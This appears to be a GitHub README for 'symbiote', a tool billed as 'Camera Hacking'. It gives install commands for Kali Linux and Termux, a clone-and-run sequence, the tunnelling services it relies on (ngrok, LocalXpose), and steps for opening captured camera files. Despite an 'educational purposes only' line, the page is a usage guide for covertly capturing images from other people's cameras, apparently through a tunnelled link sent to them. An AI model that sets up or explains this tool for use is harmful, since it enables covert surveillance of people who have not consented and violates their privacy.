userid9708 / symbiote

Camera Hacking

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

#TO BE USED FOR EDUCATIONAL PURPOSES ONLY#

AVAILABLE TUNNELLING OPTIONS**

  1. LOCALXPOSE (https://localxpose.io)
  2. NGROK (https://ngrok.com/)

Installing (Kali Linux/Termux):

step 1 (install this before you start):

apt update && upgrade
apt-get install python -y
apt-get install wget -y
apt-get install php -y
apt-get install openssh -y

step 2:

git clone https://github.com/404-ghost/symbiote
cd symbiote
python3 symbiote.py

step 3:

After you got your cam file:

cd symbiote
cd CapturedData 
ls
termux-open <file_name>

PREREQUISITES:

  • Python 3
  • PHP
  • wget

VIDEO (step by step command):

Watch the video

SCREENSHOT (Kali-linux):

Shot

SCREENSHOT (android-termux):

Shot

About

Camera Hacking

License:MIT License


Languages

Language:Python 88.2%Language:HTML 8.3%Language:PHP 3.5%